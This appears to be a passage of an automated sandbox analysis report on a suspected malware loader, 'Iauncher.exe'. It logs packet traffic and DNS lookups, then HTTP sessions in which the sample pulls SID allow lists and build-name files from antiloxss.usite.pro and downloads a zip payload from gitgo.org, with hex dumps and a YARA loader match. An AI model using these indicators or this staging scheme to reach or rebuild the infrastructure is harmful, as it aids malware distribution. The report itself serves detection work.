                                                                                                                                                  May 1, 2024 20:36:03.524302959 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.524312973 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.524326086 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.725469112 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.725641012 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.726085901 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.726131916 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.726442099 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.726526976 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.726748943 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.726901054 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.727046967 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.727092028 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.727305889 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.729288101 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.729337931 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.928340912 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.928366899 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.928442001 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.928613901 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.928805113 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.928972960 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.929286003 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.931513071 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.931556940 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.931632996 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.931821108 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.931986094 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.932251930 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.932312012 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.960031986 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.960124969 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.960124969 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.960180044 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:04.162429094 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.162451029 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.162619114 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.162724018 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.162915945 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.163132906 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.163206100 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.163422108 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.163525105 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.163691998 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.163846970 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.163911104 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.164081097 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.164243937 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.164396048 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.207410097 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:04.207494020 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:04.207494020 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:04.207552910 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:04.409851074 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.409955978 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.410082102 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.410307884 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.410413027 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.410629034 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.410712004 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.410859108 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.411027908 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.411091089 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.411293030 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.411355972 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.411456108 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.411608934 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.437783003 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:04.640146017 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.640168905 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.640403032 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.640446901 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:05.638952017 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:05.641411066 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:05.845026970 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:06.041215897 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:06.086258888 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:06.201443911 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:06.201544046 CEST4971147232192.168.2.7147.45.47.65
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 1, 2024 20:35:42.249021053 CEST | 53343 | 53 | 192.168.2.7 | 1.1.1.1
May 1, 2024 20:35:42.698146105 CEST | 53 | 53343 | 1.1.1.1 | 192.168.2.7
May 1, 2024 20:35:43.823007107 CEST | 60119 | 53 | 192.168.2.7 | 1.1.1.1
May 1, 2024 20:35:43.917963982 CEST | 53 | 60119 | 1.1.1.1 | 192.168.2.7
May 1, 2024 20:35:48.993186951 CEST | 53029 | 53 | 192.168.2.7 | 1.1.1.1
May 1, 2024 20:35:49.434597969 CEST | 53 | 53029 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Checksum | Code | Type
May 1, 2024 20:35:43.920305014 CEST | 192.168.2.7 | 172.253.122.101 | 4d5a |  | Echo
May 1, 2024 20:35:44.015465021 CEST | 172.253.122.101 | 192.168.2.7 | 555a |  | Echo Reply

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 1, 2024 20:35:42.249021053 CEST | 192.168.2.7 | 1.1.1.1 | 0x6ca9 | Standard query (0) | antiloxss.usite.pro | A (IP address) | IN (0x0001) | false
May 1, 2024 20:35:43.823007107 CEST | 192.168.2.7 | 1.1.1.1 | 0x8fe6 | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false
May 1, 2024 20:35:48.993186951 CEST | 192.168.2.7 | 1.1.1.1 | 0xda6c | Standard query (0) | gitgo.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 1, 2024 20:35:42.698146105 CEST | 1.1.1.1 | 192.168.2.7 | 0x6ca9 | No error (0) | antiloxss.usite.pro |  | 193.109.246.100 | A (IP address) | IN (0x0001) | false
May 1, 2024 20:35:43.917963982 CEST | 1.1.1.1 | 192.168.2.7 | 0x8fe6 | No error (0) | google.com |  | 172.253.122.101 | A (IP address) | IN (0x0001) | false
May 1, 2024 20:35:43.917963982 CEST | 1.1.1.1 | 192.168.2.7 | 0x8fe6 | No error (0) | google.com |  | 172.253.122.139 | A (IP address) | IN (0x0001) | false
May 1, 2024 20:35:43.917963982 CEST | 1.1.1.1 | 192.168.2.7 | 0x8fe6 | No error (0) | google.com |  | 172.253.122.138 | A (IP address) | IN (0x0001) | false
May 1, 2024 20:35:43.917963982 CEST | 1.1.1.1 | 192.168.2.7 | 0x8fe6 | No error (0) | google.com |  | 172.253.122.113 | A (IP address) | IN (0x0001) | false
May 1, 2024 20:35:43.917963982 CEST | 1.1.1.1 | 192.168.2.7 | 0x8fe6 | No error (0) | google.com |  | 172.253.122.100 | A (IP address) | IN (0x0001) | false
May 1, 2024 20:35:43.917963982 CEST | 1.1.1.1 | 192.168.2.7 | 0x8fe6 | No error (0) | google.com |  | 172.253.122.102 | A (IP address) | IN (0x0001) | false
May 1, 2024 20:35:49.434597969 CEST | 1.1.1.1 | 192.168.2.7 | 0xda6c | No error (0) | gitgo.org |  | 172.67.202.98 | A (IP address) | IN (0x0001) | false
May 1, 2024 20:35:49.434597969 CEST | 1.1.1.1 | 192.168.2.7 | 0xda6c | No error (0) | gitgo.org |  | 104.21.44.179 | A (IP address) | IN (0x0001) | false
                                                                                                                                                  • antiloxss.usite.pro
                                                                                                                                                  • gitgo.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 193.109.246.100 | 443 | 6692 | C:\Users\user\Desktop\Iauncher.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-01 18:35:43 UTC | 98 | OUT | GET /STLprograms/NEW/z-Closing.txt HTTP/1.1
Host: antiloxss.usite.pro
Connection: Keep-Alive
2024-05-01 18:35:43 UTC | 324 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 May 2024 18:35:40 GMT
Content-Type: text/plain
Content-Length: 3
Last-Modified: Mon, 15 Apr 2024 17:02:11 GMT
Connection: close
ETag: "661d5d93-3"
Expires: Tue, 21 May 2024 18:35:40 GMT
Cache-Control: max-age=1728000
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
2024-05-01 18:35:43 UTC | 3 | IN | Data Raw: 31 30 30
Data Ascii: 100


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49702 | 193.109.246.100 | 443 | 6692 | C:\Users\user\Desktop\Iauncher.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-01 18:35:44 UTC | 69 | OUT | GET /STLprograms/NEW/hwid.txt HTTP/1.1
Host: antiloxss.usite.pro
2024-05-01 18:35:44 UTC | 327 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 May 2024 18:35:41 GMT
Content-Type: text/plain
Content-Length: 183
Last-Modified: Wed, 17 Apr 2024 21:03:02 GMT
Connection: close
ETag: "66203906-b7"
Expires: Tue, 21 May 2024 18:35:41 GMT
Cache-Control: max-age=1728000
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
2024-05-01 18:35:44 UTC | 183 | IN | Data Raw: 53 2d 31 2d 35 2d 32 31 2d 31 38 37 38 35 36 33 38 36 33 2d 32 36 32 37 33 37 33 32 30 37 2d 33 31 31 34 31 32 37 33 33 33 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 32 34 39 39 36 32 30 37 39 39 2d 32 34 31 35 33 31 36 38 39 31 2d 38 37 34 30 38 34 35 34 36 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 33 32 30 37 38 37 35 35 2d 31 37 36 39 31 31 34 32 35 34 31 2d 31 30 34 38 30 33 30 35 37 35 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 33 32 30 37 38 37 35 35 2d 31 37 36 39 31 31 34 32 35 34 2d 31 30 34 38 30 33 30 35 37 35 2d 31 30 30 31
Data Ascii:
S-1-5-21-1878563863-2627373207-3114127333-1001
S-1-5-21-2499620799-2415316891-874084546-1001
S-1-5-21-32078755-17691142541-1048030575-1001
S-1-5-21-32078755-1769114254-1048030575-1001


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49703 | 193.109.246.100 | 443 | 6692 | C:\Users\user\Desktop\Iauncher.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-01 18:35:45 UTC | 77 | OUT | GET /STLprograms/NEW/LM19AR/hwids.txt HTTP/1.1
Host: antiloxss.usite.pro
2024-05-01 18:35:45 UTC | 326 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 May 2024 18:35:42 GMT
Content-Type: text/plain
Content-Length: 44
Last-Modified: Wed, 24 Apr 2024 18:13:24 GMT
Connection: close
ETag: "66294bc4-2c"
Expires: Tue, 21 May 2024 18:35:42 GMT
Cache-Control: max-age=1728000
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
2024-05-01 18:35:45 UTC | 44 | IN | Data Raw: 53 2d 31 2d 35 2d 32 31 2d 32 32 35 32 33 36 39 36 35 36 2d 31 30 35 37 34 34 30 37 34 30 2d 38 33 34 34 36 37 31 33 2d 31 30 30 31
Data Ascii: S-1-5-21-2252369656-1057440740-83446713-1001


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49705 | 193.109.246.100 | 443 | 6692 | C:\Users\user\Desktop\Iauncher.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-01 18:35:46 UTC | 88 | OUT | GET /STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txt HTTP/1.1
Host: antiloxss.usite.pro
2024-05-01 18:35:47 UTC | 326 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 May 2024 18:35:43 GMT
Content-Type: text/plain
Content-Length: 30
Last-Modified: Thu, 25 Apr 2024 15:24:42 GMT
Connection: close
ETag: "662a75ba-1e"
Expires: Tue, 21 May 2024 18:35:43 GMT
Cache-Control: max-age=1728000
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
2024-05-01 18:35:47 UTC | 30 | IN | Data Raw: 68 74 74 70 73 3a 2f 2f 67 69 74 67 6f 2e 6f 72 67 2f 49 61 75 6e 63 68 65 72 2e 7a 69 70
Data Ascii: https://gitgo.org/Iauncher.zip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49706 | 193.109.246.100 | 443 | 6692 | C:\Users\user\Desktop\Iauncher.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-01 18:35:47 UTC | 88 | OUT | GET /STLprograms/NEW/LM19AR/Gitgo2/BuildName.txt HTTP/1.1
Host: antiloxss.usite.pro
2024-05-01 18:35:48 UTC | 325 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 May 2024 18:35:44 GMT
Content-Type: text/plain
Content-Length: 12
Last-Modified: Thu, 25 Apr 2024 15:24:42 GMT
Connection: close
ETag: "662a75ba-c"
Expires: Tue, 21 May 2024 18:35:44 GMT
Cache-Control: max-age=1728000
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
2024-05-01 18:35:48 UTC | 12 | IN | Data Raw: 49 61 75 6e 63 68 65 72 2e 65 78 65
Data Ascii: Iauncher.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49708 | 193.109.246.100 | 443 | 6692 | C:\Users\user\Desktop\Iauncher.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-01 18:35:48 UTC | 91 | OUT | GET /STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txt HTTP/1.1
Host: antiloxss.usite.pro
2024-05-01 18:35:48 UTC | 325 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 May 2024 18:35:45 GMT
Content-Type: text/plain
Content-Length: 12
Last-Modified: Thu, 25 Apr 2024 15:24:42 GMT
Connection: close
ETag: "662a75ba-c"
Expires: Tue, 21 May 2024 18:35:45 GMT
Cache-Control: max-age=1728000
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
2024-05-01 18:35:48 UTC | 12 | IN | Data Raw: 49 61 75 6e 63 68 65 72 2e 7a 69 70
Data Ascii: Iauncher.zip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49710 | 172.67.202.98 | 443 | 6692 | C:\Users\user\Desktop\Iauncher.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-01 18:35:49 UTC | 71 | OUT | GET /Iauncher.zip HTTP/1.1
Host: gitgo.org
Connection: Keep-Alive
2024-05-01 18:35:50 UTC | 681 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 18:35:50 GMT
Content-Type: application/zip
Content-Length: 418397
Connection: close
Last-Modified: Thu, 25 Apr 2024 15:31:32 GMT
ETag: "6625d-616ed7b506247"
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCLdCLfavCmoVAMJjOnInGiyjOd0OPuKjVniCyLiRcs5R%2B%2BEp9QBZOfiFZvC3ul5tMl%2FPis6PAC%2FO0nHg6S1MKDLH37uyY2W7nFZMOMtz5fI6vVVCTk2Ya%2BGBII%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87d1dfa45d0b0854-IAD
alt-svc: h3=":443"; ma=86400
                                                                                                                                                  Data Ascii: KHa=#\H8bGeYietCG IK{lSHq,)AirexN_mf=y`*<1je|H}b@S}>:0lN]0;t0 Y`F=(}`cOFOv\bbcOVwx7k
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: 57 09 c4 8d b1 18 83 2c 8a 0d d5 a4 b6 5f 6c 7a 16 9b de 94 53 f8 ac 80 cf 99 85 c8 49 b5 72 53 45 cb f4 c6 13 8b 24 be f9 ac 48 7a bb e9 9a ba 0e f3 15 73 95 36 33 e9 dc 74 90 03 36 b8 0c 5a 92 c7 d6 dd 72 57 64 32 bc 0b d0 17 52 5a 4a 4c 91 31 a1 6e 4b ff 1e 47 b6 75 69 b3 19 da b5 bd c8 04 12 45 9f 5e c8 1b e4 29 d0 3c 7d 15 3e bf 97 7c 40 1f cc 62 4a f1 bd d0 e9 b7 7b 9f 81 7f f4 df 59 c8 51 02 e9 55 da bd 99 a4 ef e8 33 cc d6 ce 73 9b 7a d1 c6 18 b7 ec 36 39 9a e0 ab a2 12 28 f0 01 bd ef 4f 68 45 d5 a0 4a 5e fa 07 4c 0d 89 21 cf f5 8e fa a3 cf 38 f5 37 90 c3 34 be c6 cc 5d 9c 7a af a0 de 0b 7a b7 5d b6 00 53 37 92 48 59 cc 3e e7 f6 82 88 f3 c8 17 d0 12 0b 30 62 ad d7 5f bf 1d 7b d3 eb 2c c8 a6 19 45 42 e8 4e 0c fd c3 17 a8 c1 cf 52 17 d8 e3 59 4b e7
                                                                                                                                                  Data Ascii: W,_lzSIrSE$Hzs63t6ZrWd2RZJL1nKGuiE^)<}>|@bJ{YQU3sz69(OhEJ^L!874]zz]S7HY>0b_{,EBNRYK
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: ed a2 c6 9f a5 96 d8 48 c7 6a 33 49 f3 69 73 05 50 e3 ac 15 5e 1f bd 62 69 6c 07 c9 39 1c e9 a8 89 4c 84 a1 d0 ee 81 a9 77 37 ae bb 57 d0 a9 54 d7 6b 97 55 1b f2 36 64 6d 3d 35 eb 8b be 91 35 26 83 ec 7d f4 35 ee d4 8c 31 a2 dd 03 b3 df 6e 28 a2 82 ce f9 2c 29 63 e2 11 60 dc 2a dd 53 d4 42 2b b9 c6 e6 9b d9 29 2d 6c 6c b0 72 f2 82 fe 56 5e 4a 7b 23 1b e5 4e 5b 7f ab f9 8d 3c 78 db e6 85 1f 71 61 9f e6 89 06 4c 5e 9a c9 cc c7 5e 1f 0e d2 7f f7 42 77 c8 63 dd e1 90 37 32 a6 06 15 05 b6 e8 9f 53 15 23 ac 8f f4 c5 6c 5f b9 ca 3a bb 48 f6 c2 db 78 7d 85 cd a7 df 6d 5b 42 5f f9 8c 2d 4e 60 07 44 3d 26 fe 47 37 97 1b 6b 0e 50 21 5c e6 43 ca 27 e2 a4 53 e3 04 6c 33 66 53 c9 f9 18 fb 49 4c 8e 01 de 26 c0 38 29 e5 e1 bb 0e 46 7a 18 ca 63 7b 8a 32 3e d7 75 04 c0 22
                                                                                                                                                  Data Ascii: Hj3IisP^bil9Lw7WTkU6dm=55&}51n(,)c`*SB+)-llrV^J{#N[<xqaL^^Bwc72S#l_:Hx}m[B_-N`D=&G7kP!\C'Sl3fSIL&8)Fzc{2>u"
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: 90 64 7d 6e 5e 50 17 9b 1e 86 86 04 39 b0 9b 5e f9 2f 5d 6f 6c 38 c4 49 6b 95 e5 94 63 6a 58 1a 08 9e de b9 ce 7d 01 be 56 89 ea e2 c2 f7 d5 4a 1a 5f 52 ea 4d 5e 52 aa 4d ef 48 2c 29 0d a6 47 fd 64 07 ad 82 8e b8 6d f9 d5 b1 25 25 00 21 50 70 25 4d 68 6e b1 25 a5 68 fa 3a 6b fa 71 3f bd e8 6b d4 0f bb 69 c3 21 a8 72 3b 3d 7b 26 37 a2 c0 91 4a a1 02 65 e8 eb 6c ae 1d 2b 6f 40 51 ba da ca 44 e9 b9 20 4a a7 9d 22 4a e7 ec d0 e6 7a 0b 35 be a6 dc e7 a5 f7 7f 8d 7b b9 65 9b 8f de 69 36 14 78 10 aa 51 a2 8b 49 eb 4b 98 b8 fe fa 3f 0c a9 da ca d1 e7 8f c6 94 05 6c 3c 55 e8 70 f3 5c b7 b1 dc a0 34 58 4d f2 78 52 26 04 26 d5 4b a8 8b 5c f5 4f 5d 8f 4c 00 aa d3 4a 1e 77 a9 e3 76 8d af 41 ac 01 b1 1c 05 f4 6d f5 b1 75 8a 72 52 6e 73 95 db 57 4d 43 c9 59 2b 32 a9 85
                                                                                                                                                  Data Ascii: d}n^P9^/]ol8IkcjX}VJ_RM^RMH,)Gdm%%!Pp%Mhn%h:kq?ki!r;={&7Jel+o@QD J"Jz5{ei6xQIK?l<Up\4XMxR&&K\O]LJwvAmurRnsWMCY+2
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: 8e 94 03 a2 c1 f7 ec e1 35 b5 31 2c d8 be 94 07 8f c3 d8 c4 fc e8 9f 90 b1 9f 87 af 48 96 21 ba e3 38 22 84 5d 97 ee c4 ed dd d5 42 c0 5c 8f cb 1d aa 85 3e 52 07 8f 05 3c d6 5e 3a 07 b4 cf 07 10 e0 5e fe 65 3c 5c 40 fa 3a 16 08 38 36 71 a9 32 62 a5 b7 41 9c 72 8b 80 f0 f4 59 84 03 89 7d 81 15 12 8e f5 d2 c2 5f e2 de a6 05 56 ec d3 8c d7 b2 65 e2 fe c0 6c c8 f3 2f 0b 58 87 a7 d7 e1 38 48 a3 8f e0 a3 84 a7 cb 31 8b 52 c1 19 0a 76 89 8f 84 d4 12 01 26 a1 39 15 34 85 ed 40 77 86 ea f2 f9 55 0d 99 e4 3d d2 de fa b9 45 e9 4e 13 5f 5a 74 95 55 7c be d5 19 6a 86 97 62 d0 ea 01 b5 f5 1f 2c c3 1d 69 06 1d 88 c7 0e c3 c1 e7 ec cf 5f 21 48 93 ea 88 c7 fa 8a 8e 66 59 57 db 9a 9c 66 93 33 e4 8e cc d1 2a 87 a0 f7 2f f1 c1 34 59 1e 30 69 65 56 60 c2 b9 fa 24 c1 0d bc 20
                                                                                                                                                  Data Ascii: 51,H!8"]B\>R<^:^e<\@:86q2bArY}_Vel/X8H1Rv&94@wU=EN_ZtU|jb,i_!HfYWf3*/4Y0ieV`$
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: cd b9 3e fa c5 f8 ff 4d 35 b6 db 46 aa 01 e5 3d 39 fe db ab 01 fc 5e 19 14 57 17 35 ce f3 be 0a 22 8f 94 0f 33 b4 1d 64 3d db 02 94 41 8a 2d 03 96 7f 6a 25 82 a5 55 e9 8e 92 3d a4 d3 d5 07 7a 7d 9f eb 1f 6b cc e4 ad 72 dc e5 fa 13 66 71 b1 d5 d6 18 92 8b d2 3b 2b d9 1c 0c 43 4d b9 17 74 fd 1b 1a ef 9d cf 49 d7 13 cb 9b c8 29 fd 64 85 35 c1 b8 de d2 df ab 73 45 a5 95 e4 de 3c 94 85 b3 35 cf 7e dc a3 48 76 79 71 ab b3 b6 c0 ed 1d e1 70 ce ae 9c 56 69 3a 0a 03 67 a3 30 20 cf 6b fe c1 fc 2d 26 e0 ee b5 35 ce b7 97 d1 36 1b 6e 33 80 30 22 ef 87 c4 39 7d d2 44 7d d5 22 1f 2e 84 fe e4 19 86 a6 ab 4f 1e 83 a8 80 c8 14 e9 9c 13 8a 6c 47 be c8 6c ef 68 77 5a 63 23 ed 39 61 e0 91 2e 8f 75 a5 05 78 05 ae e0 42 7d 45 cd 7e 56 4e 1f d9 65 69 cb 79 ab b0 dc bb 84 3e 31
                                                                                                                                                  Data Ascii: >M5F=9^W5"3d=A-j%U=z}krfq;+CMtI)d5sE<5~HvyqpVi:g0 k-&56n30"9}D}".OlGlhwZc#9a.uxB}E~VNeiy>1
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: 80 ed 6f 2f 99 6f ca f7 ec 14 9b 6e d2 19 d5 7b 96 c1 93 e9 32 31 6b d7 29 04 42 fe 84 24 39 1f b8 53 be b0 6a 3a 10 4c 4a ad cb bf 7b 18 98 40 c9 6c 9f 0e 7a 76 96 c2 0d d3 f5 c3 48 41 0f 23 4c 01 02 5d a9 6c cc e3 e4 69 80 87 e6 19 86 2a 0f 7b 29 17 c7 37 a5 0e 74 e4 b3 20 a5 76 5d 41 be 20 59 eb d4 cb 80 96 ef 82 10 1d f9 77 1d 9e 5b 5f 16 37 d3 c6 18 a7 3f 4b 2b 29 c8 37 cb 53 95 06 bb 49 b6 b3 ac c7 21 93 a8 b6 29 ed c3 ca 3b 3a 6e 3e b0 41 00 2b bf 8e fe 65 40 d7 a1 9c 6a d2 9e 1e 96 53 31 91 64 d7 65 7b 85 0f d0 a1 6d bf 62 24 81 06 9b 87 2c 0b 83 e6 ff 22 66 84 ca 01 3c 2e 38 6e f4 c6 35 6e b2 71 21 29 8b 92 ca 21 e5 26 81 53 6e b2 72 6c 33 9f ba c2 a6 ae b5 47 a6 a2 6d 4a d0 95 52 5e 8f 47 2b 37 d9 e0 cf ce b1 0a d8 b1 02 23 30 ce 2e b5 54 50 4b
                                                                                                                                                  Data Ascii: o/on{21k)B$9Sj:LJ{@lzvHA#L]li*{)7t v]A Yw[_7?K+)7SI!);:n>A+e@jS1de{mb$,"f<.8n5nq!)!&Snrl3GmJR^G+7#0.TPK



                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:20:35:40
                                                                                                                                                  Start date:01/05/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Iauncher.exe"
                                                                                                                                                  Imagebase:0x590000
                                                                                                                                                  File size:732'672 bytes
                                                                                                                                                  MD5 hash:E69FEB7FD40F408A088D879BE323F37A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1184729227.0000000000592000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
